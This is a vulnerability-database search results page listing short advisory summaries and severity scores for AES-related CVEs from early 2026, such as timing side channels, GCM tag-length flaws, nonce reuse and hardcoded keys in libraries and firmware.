Lucene search
K

210 matches found

Debian CVE
Debian CVE
added 2026/03/20 2:48 a.m.5 views

CVE-2026-32935

phpseclib is a PHP secure communications library. Projects using versions 0.1.1 through 1.0.26, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a to padding oracle timing attack when using AES in CBC mode. This issue has been fixed in versions 1.0.27, 2.0.52 and 3.0.50...

8.2CVSS5.7AI score0.00374EPSS
Exploits0
Cvelist
Cvelist
added 2026/03/19 12:0 a.m.22 views

CVE-2025-67112

Use of a hard-coded AES-256-CBC key in the configuration backup/restore implementation of Small Cell Sercomm SCE4255W FreedomFi Englewood firmware before DG3934v3@2308041842 allows remote authenticated users to decrypt, modify, and re-encrypt device configurations, enabling credential manipulatio...

0.00401EPSS
Exploits0References3
NVD
NVD
added 2026/03/16 2:19 p.m.5 views

CVE-2026-32600

xml-security is a library that implements XML signatures and encryption. Prior to versions 2.3.1 and 1.13.9, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag,...

8.2CVSS0.00148EPSS
Exploits1References3
Packet Storm News
Packet Storm News
added 2026/03/16 12:0 a.m.1 views

Botan C++ Crypto Algorithms Library 3.11.0

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS 10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to...

5.8AI score
Exploits0
CNNVD
CNNVD
added 2026/03/16 12:0 a.m.8 views

Xmlseclibs 安全漏洞

Xmlseclibs is a library developed by robrichards, written in PHP, for handling XML encryption and signing. Versions of Xmlseclibs prior to 3.1.5 contained security vulnerabilities. These vulnerabilities stemmed from the lack of authentication tag length validation for XML nodes encrypted using...

8.2CVSS5.9AI score0.00152EPSS
Exploits1References3
Snyk
Snyk
added 2026/03/13 10:41 p.m.2 views

Improper Validation of Integrity Check Value

Overview robrichards/xmlseclibs is a PHP library for XML Security. Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value in the decryptSymmetric function, when checking tag length for the aes-128-gcm, aes-192-gcm, and aes-256-gcm encryption algorithms. A...

8.2CVSS5.9AI score0.00152EPSS
Exploits1References2
CVE
CVE
added 2026/03/13 7:58 p.m.25 views

CVE-2026-32600

XML-Security library (xml-security) is affected in versions prior to 2.3.1 and 1.13.9 where AES-GCM encrypted XML nodes do not validate the authentication tag length. This can allow an attacker to brute-force the authentication tag, recover the GHASH key, decrypt encrypted nodes, and forge cipher...

8.2CVSS5.9AI score0.00148EPSS
Exploits1References3Affected Software1
Tenable Nessus
Tenable Nessus
added 2026/03/05 12:0 a.m.6 views

Linux Distros Unpatched Vulnerability : CVE-2026-3337

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing...

8.2CVSS6AI score0.01079EPSS
Exploits0References2
OSV
OSV
added 2026/03/03 8:9 p.m.8 views

GHSA-65P9-R9H6-22VJ AWS-LC has Timing Side-Channel in AES-CCM Tag Verification

Summary AWS-LC is an open-source, general-purpose cryptographic library. Impact Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. The impacted implementations are through the EVP...

8.2CVSS6AI score0.01079EPSS
Exploits0References7
Cvelist
Cvelist
added 2026/03/02 9:20 p.m.31 views

CVE-2026-3337 Timing Side-Channel in AES-CCM Tag Verification in AWS-LC

Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. The impacted implementations are through the EVP CIPHER API: EVPaes128ccm, EVPaes192ccm, and EVPaes256ccm. Customers of AWS servic...

8.2CVSS0.01079EPSS
Exploits0References3
Packet Storm News
Packet Storm News
added 2026/02/26 12:0 a.m.3 views

A High-Throughput AES-GCM Implementation on GPUs for Secure, Policy-Based Access to Massive Astronomical Catalogs

The era of large astronomical surveys generates massive image catalogs requiring efficient and secure access, particularly during pre-publication periods where data confidentiality and integrity are paramount. While Findable, Accessible, Interoperable, and Reusable FAIR principles guide the...

6.1AI score
Exploits0
OSV
OSV
added 2026/02/19 5:28 p.m.5 views

GO-2026-4479 Usage of random nonce generation with AES GCM ciphers risks leaking the authentication key in github.com/pion/dtls

Usage of random nonce generation with AES GCM ciphers risks leaking the authentication key in github.com/pion/dtls...

5.9CVSS5.5AI score0.00619EPSS
Exploits0References4
Github Security Blog
Github Security Blog
added 2026/02/18 10:33 p.m.5 views

uTLS has a fingerprint vulnerability from GREASE ECH mismatch for Chrome parrots

There is a fingerprint mismatch with Chrome when using GREASE ECH, having to do with ciphersuite selection. When Chrome selects the preferred ciphersuite in the outer ClientHello and the ciphersuite for ECH, it does so consistently based on hardware support. That means, for example, if it prefers...

5.3CVSS5.5AI score0.00154EPSS
Exploits0References6Affected Software1
IBM Security Bulletins
IBM Security Bulletins
added 2026/02/18 10:5 p.m.8 views

Security Bulletin: IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is affected by a vulnerability that could provide weaker than expected security (CVE-2025-13333)

Summary IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is affected by a vulnerability that could provide weaker than expected security when enabling AES-256 password encryption. Vulnerability Details Refer to the security bulletins listed in the...

4.9CVSS5.5AI score0.0031EPSS
Exploits0Affected Software1
RedhatCVE
RedhatCVE
added 2026/02/15 1:19 a.m.13 views

CVE-2026-26334

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\\VeraSMART Data\\app.settings. An attacker with local access to the...

8.5CVSS5.6AI score0.00087EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/02/13 8:53 p.m.22 views

CVE-2026-26334 Calero VeraSMART < 2026 R1 Hardcoded Static AES Keys Allow Decryption of Service Credentials

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\VeraSMART Data\app.settings. An attacker with local access to the...

8.5CVSS0.00087EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2026/02/13 8:53 p.m.6 views

CVE-2026-26334 Calero VeraSMART < 2026 R1 Hardcoded Static AES Keys Allow Decryption of Service Credentials

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\VeraSMART Data\app.settings. An attacker with local access to the...

8.5CVSS5.6AI score0.00087EPSS
Exploits0References2
CVE
CVE
added 2026/02/11 9:7 p.m.20 views

CVE-2026-26014

Pion DTLS (Go) vulnerability CVE-2026-26014 affects versions v1.0.0–v3.1.0 due to improper nonce generation with AES-GCM ciphers, enabling nonce reuse in a session. This can let remote attackers obtain the authentication key and spoof data. Remedy: upgrade to v3.1.0 or later. The provided documen...

5.9CVSS5.6AI score0.00619EPSS
Exploits0References6Affected Software1
Vulnrichment
Vulnrichment
added 2026/02/11 9:7 p.m.6 views

CVE-2026-26014 Pion DTLS uses random nonce generation with AES GCM ciphers risks leaking the authentication key

Pion DTLS is a Go implementation of Datagram Transport Layer Security. Pion DTLS versions v1.0.0 through v3.1.0 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a...

5.9CVSS5.6AI score0.00619EPSS
Exploits0References4
Snyk
Snyk
added 2026/02/11 3:13 p.m.5 views

Inadequate Encryption Strength

Overview Affected versions of this package are vulnerable to Inadequate Encryption Strength due to the use of the random nonce generation with AES GCM ciphers. An attacker can obtain the authentication key and spoof data by exploiting nonce reuse within a session. Remediation Upgrade...

8.2CVSS5.7AI score0.00619EPSS
Exploits0References2
Rows per page
Query Builder